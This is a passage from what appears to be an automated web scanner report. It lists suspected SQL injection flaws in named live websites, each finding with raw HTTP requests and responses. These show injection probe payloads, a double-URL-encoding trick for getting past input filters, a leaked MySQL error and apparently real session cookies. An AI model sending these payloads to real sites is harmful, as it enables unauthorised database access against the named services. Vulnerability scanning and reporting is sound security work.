Cookie: ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0; CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1; LP=1296062048;

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 28 Jan 2011 16:44:08 GMT
Server: Apache
Vary: accept-language
Accept-Ranges: bytes
Keep-Alive: timeout=120
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Content-Length: 1059

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...
<dd>
If you think this is a server error, please contact
the <a href="mailto:serveradmin@dynamiclogic.com">
...[SNIP]...

Request 2

GET /adscgen/st.php/1%00'' HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0; CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1; LP=1296062048;

Response 2

HTTP/1.1 404 Not Found
Date: Fri, 28 Jan 2011 16:44:08 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
Content-Length: 214
Keep-Alive: timeout=120, max=888
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /adscgen/st.php/1 was not found on this server.</p>
<
...[SNIP]...

1.8. http://assets.rubiconproject.com/static/rtb/sync-min.html/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://assets.rubiconproject.com
Path:	/static/rtb/sync-min.html/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /static'%20and%201%3d1--%20/rtb/sync-min.html/ HTTP/1.1
Host: assets.rubiconproject.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; lm="26 Jan 2011 20:13:41 GMT"; pup_w55c=1296073239463; put_1185=3011330574290390485; khaos=GIPAEQ2D-C-IOYY; au=GIP9HWY4-MADS-10.208.38.239; put_1197=3271971346728586924; pup_1994=1296072492983; ruid=154d290e46adc1d6f373dd09^5^1296224069^2915161843; rpb=4214%3D1%264894%3D1%264939%3D1%265671%3D1%262399%3D1%263615%3D1%264940%3D1%262372%3D1%263169%3D1%262200%3D1%262374%3D1%265574%3D1%264210%3D1%264212%3D1; rdk=5804/7477; csi2=3159497.js^1^1296073176^1296073176&3138557.js^1^1296072462^1296072462; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; put_2081=CA-00000000456885722; csi15=3173813.js^1^1296073209^1296073209&3180301.js^1^1296073207^1296073207; put_1986=4760492999213801733; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk2=0; ses2=7477^1; put_1994=6ch47d7o8wtv; cd=false;

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
Content-Length: 326
_onnection: close
Content-Type: text/html; charset=iso-8859-1
Date: Fri, 28 Jan 2011 16:44:21 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /static' and 1=1-- /rtb/sync-min.html/ was not found
...[SNIP]...
</p>
<hr>
<address>Apache/2.2.3 (Red Hat) Server at assets.rubiconproject.com Port 80</address>
</body></html>

Request 2

GET /static'%20and%201%3d2--%20/rtb/sync-min.html/ HTTP/1.1
Host: assets.rubiconproject.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; lm="26 Jan 2011 20:13:41 GMT"; pup_w55c=1296073239463; put_1185=3011330574290390485; khaos=GIPAEQ2D-C-IOYY; au=GIP9HWY4-MADS-10.208.38.239; put_1197=3271971346728586924; pup_1994=1296072492983; ruid=154d290e46adc1d6f373dd09^5^1296224069^2915161843; rpb=4214%3D1%264894%3D1%264939%3D1%265671%3D1%262399%3D1%263615%3D1%264940%3D1%262372%3D1%263169%3D1%262200%3D1%262374%3D1%265574%3D1%264210%3D1%264212%3D1; rdk=5804/7477; csi2=3159497.js^1^1296073176^1296073176&3138557.js^1^1296072462^1296072462; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; put_2081=CA-00000000456885722; csi15=3173813.js^1^1296073209^1296073209&3180301.js^1^1296073207^1296073207; put_1986=4760492999213801733; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk2=0; ses2=7477^1; put_1994=6ch47d7o8wtv; cd=false;

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
Content-Length: 235
_onnection: close
Content-Type: text/html; charset=iso-8859-1
Date: Fri, 28 Jan 2011 16:44:21 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /static' and 1=2-- /rtb/sync-min.html/ was not found
...[SNIP]...
</p>
</body></html>

1.9. http://assets.rubiconproject.com/static/rtb/sync-min.html/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://assets.rubiconproject.com
Path:	/static/rtb/sync-min.html/

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 32712709'%20or%201%3d1--%20 and 32712709'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /static/rtb/sync-min.html32712709'%20or%201%3d1--%20/ HTTP/1.1
Host: assets.rubiconproject.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; lm="26 Jan 2011 20:13:41 GMT"; pup_w55c=1296073239463; put_1185=3011330574290390485; khaos=GIPAEQ2D-C-IOYY; au=GIP9HWY4-MADS-10.208.38.239; put_1197=3271971346728586924; pup_1994=1296072492983; ruid=154d290e46adc1d6f373dd09^5^1296224069^2915161843; rpb=4214%3D1%264894%3D1%264939%3D1%265671%3D1%262399%3D1%263615%3D1%264940%3D1%262372%3D1%263169%3D1%262200%3D1%262374%3D1%265574%3D1%264210%3D1%264212%3D1; rdk=5804/7477; csi2=3159497.js^1^1296073176^1296073176&3138557.js^1^1296072462^1296072462; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; put_2081=CA-00000000456885722; csi15=3173813.js^1^1296073209^1296073209&3180301.js^1^1296073207^1296073207; put_1986=4760492999213801733; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk2=0; ses2=7477^1; put_1994=6ch47d7o8wtv; cd=false;

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
Content-Length: 333
_onnection: close
Content-Type: text/html; charset=iso-8859-1
Date: Fri, 28 Jan 2011 16:44:24 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /static/rtb/sync-min.html32712709' or 1=1-- / was not
...[SNIP]...
</p>
<hr>
<address>Apache/2.2.3 (Red Hat) Server at assets.rubiconproject.com Port 80</address>
</body></html>

Request 2

GET /static/rtb/sync-min.html32712709'%20or%201%3d2--%20/ HTTP/1.1
Host: assets.rubiconproject.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; lm="26 Jan 2011 20:13:41 GMT"; pup_w55c=1296073239463; put_1185=3011330574290390485; khaos=GIPAEQ2D-C-IOYY; au=GIP9HWY4-MADS-10.208.38.239; put_1197=3271971346728586924; pup_1994=1296072492983; ruid=154d290e46adc1d6f373dd09^5^1296224069^2915161843; rpb=4214%3D1%264894%3D1%264939%3D1%265671%3D1%262399%3D1%263615%3D1%264940%3D1%262372%3D1%263169%3D1%262200%3D1%262374%3D1%265574%3D1%264210%3D1%264212%3D1; rdk=5804/7477; csi2=3159497.js^1^1296073176^1296073176&3138557.js^1^1296072462^1296072462; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; put_2081=CA-00000000456885722; csi15=3173813.js^1^1296073209^1296073209&3180301.js^1^1296073207^1296073207; put_1986=4760492999213801733; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk2=0; ses2=7477^1; put_1994=6ch47d7o8wtv; cd=false;

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
Content-Length: 242
_onnection: close
Content-Type: text/html; charset=iso-8859-1
Date: Fri, 28 Jan 2011 16:44:24 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /static/rtb/sync-min.html32712709' or 1=2-- / was not
...[SNIP]...
</p>
</body></html>

1.10. http://cafr.imlive.com/waccess/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://cafr.imlive.com
Path:	/waccess/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /waccess%2527/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: cafr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:17:07 GMT
Connection: close
Content-Length: 63
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

<html><body><h1> HTTP/1.1 New Session Failed</h1></body></html>

Request 2

GET /waccess%2527%2527/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: cafr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:17:08 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: icafr=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDQSQQQDTD=NAMDOIMAEMHFENAMDMFANDKA; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:07 GMT
Connection: close
Content-Length: 8336
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/

<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...

1.11. http://de.imlive.com/waccess/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://de.imlive.com
Path:	/waccess/

Issue detail

Request 1

GET /waccess'/ HTTP/1.1
Host: de.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:17:08 GMT
Connection: close
Content-Length: 63
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

<html><body><h1> HTTP/1.1 New Session Failed</h1></body></html>

Request 2

GET /waccess''/ HTTP/1.1
Host: de.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:17:08 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: ide=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDSSTRTBSD=DEBIMIMACEBMBLPLGCGPGBPD; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:08 GMT
Connection: close
Content-Length: 8237
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/

<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...

1.12. http://es.imlive.com/waccess/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://es.imlive.com
Path:	/waccess/

Issue detail

Remediation detail

Request 1

GET /waccess%2527/ HTTP/1.1
Host: es.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:17:23 GMT
Connection: close
Content-Length: 63
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

<html><body><h1> HTTP/1.1 New Session Failed</h1></body></html>

Request 2

GET /waccess%2527%2527/ HTTP/1.1
Host: es.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:17:22 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: ies=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDSSRTQCRC=BGLJMIMACIIMCJCMFKACJEGI; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:22 GMT
Connection: close
Content-Length: 8230
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/

<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...

1.13. http://fr.imlive.com/waccess/ [gotopage parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://fr.imlive.com
Path:	/waccess/

Issue detail

Request 1

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/' HTTP/1.1
Host: fr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

Request 2

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/'' HTTP/1.1
Host: fr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2 (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:17:24 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: ifr=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDQSQQRCSC=CMMFJIMAHFOLCAODNFPHKCBL; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:23 GMT
Connection: close
Content-Length: 8249
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/

<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...

1.14. http://gr.imlive.com/waccess/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://gr.imlive.com
Path:	/waccess/

Issue detail

Remediation detail

Request 1

GET /waccess%2527/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: gr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:17:34 GMT
Connection: close
Content-Length: 63
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

<html><body><h1> HTTP/1.1 New Session Failed</h1></body></html>

Request 2

GET /waccess%2527%2527/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: gr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:17:34 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: igr=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDQQRQRCTC=ABOPGJMANIICBDDCLAFKMEHJ; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:35 GMT
Connection: close
Content-Length: 8333
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/

<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...

1.15. http://ib.adnxs.com/getuid [User-Agent HTTP header] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://ib.adnxs.com
Path:	/getuid

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /getuid HTTP/1.1
Host: ib.adnxs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527
Connection: close
Cookie: anj=Kfu=8fG68%E:3F.0s]#%2L_'x%SEV/i#+L9=FzXN9?TZi)>y1-4(^NfPD+@4+=p-.ut5]P'*l.AkLC:ZoWT8jurJFwtQgyR2#Z@Gma]02msi.X/+T:%u.sH%ptkhWT<T7O/!9fZN1X_94IFwbrUH.AC0A)'9DjhifCjr1a#[FbrxvsnEr]VJ@?3JlsWCTM<[<X>vc9aJjqyKfLgisMsE@+/IU*K*VTJy:P4x>H+=q5PufidQD2]*](K9'9kOYZb; icu=EAAYAA..; uuid2=4760492999213801733; sess=1;

Response 1

HTTP/1.1 500 No url
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sat, 29-Jan-2011 16:46:47 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 16:46:47 GMT; domain=.adnxs.com; HttpOnly
Date: Fri, 28 Jan 2011 16:46:47 GMT
Content-Length: 0
Connection: close

Request 2

GET /getuid HTTP/1.1
Host: ib.adnxs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527%2527
Connection: close
Cookie: anj=Kfu=8fG68%E:3F.0s]#%2L_'x%SEV/i#+L9=FzXN9?TZi)>y1-4(^NfPD+@4+=p-.ut5]P'*l.AkLC:ZoWT8jurJFwtQgyR2#Z@Gma]02msi.X/+T:%u.sH%ptkhWT<T7O/!9fZN1X_94IFwbrUH.AC0A)'9DjhifCjr1a#[FbrxvsnEr]VJ@?3JlsWCTM<[<X>vc9aJjqyKfLgisMsE@+/IU*K*VTJy:P4x>H+=q5PufidQD2]*](K9'9kOYZb; icu=EAAYAA..; uuid2=4760492999213801733; sess=1;

Response 2

HTTP/1.1 302 Moved
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sat, 29-Jan-2011 16:46:47 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 16:46:47 GMT; domain=.adnxs.com; HttpOnly
Location: ...C
Date: Fri, 28 Jan 2011 16:46:47 GMT
Content-Length: 0
Connection: close

1.16. http://it.imlive.com/waccess/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://it.imlive.com
Path:	/waccess/

Issue detail

Request 1

GET /waccess'/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: it.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:08 GMT
Connection: close
Content-Length: 63
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

<html><body><h1> HTTP/1.1 New Session Failed</h1></body></html>

Request 2

GET /waccess''/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: it.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:25:08 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: iit=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDQSQSRBSD=MDONOIMAHFCJJOAEABNJMFBH; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:08 GMT
Connection: close
Content-Length: 8441
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/

<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...

1.17. http://local.nissanusa.com/zip.aspx [__utmz cookie] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://local.nissanusa.com
Path:	/zip.aspx

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. The payload " was submitted in the __utmz cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /zip.aspx HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46"; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:53:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:53:06 GMT
Content-Length: 5852
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
</div>
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '27'
AND a.version = 'en'
AND ac.category_page='ZPA'
AND' at line 5

1.18. http://local.nissanusa.com/zip.aspx [regionalZipCode parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://local.nissanusa.com
Path:	/zip.aspx

Issue detail

The regionalZipCode parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the regionalZipCode parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the regionalZipCode request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /zip.aspx?regionalZipCode=null%2527&vehicle=versa-hatchback&dcp=zmm.50658498.&dcc=39942763.226884546 HTTP/1.1
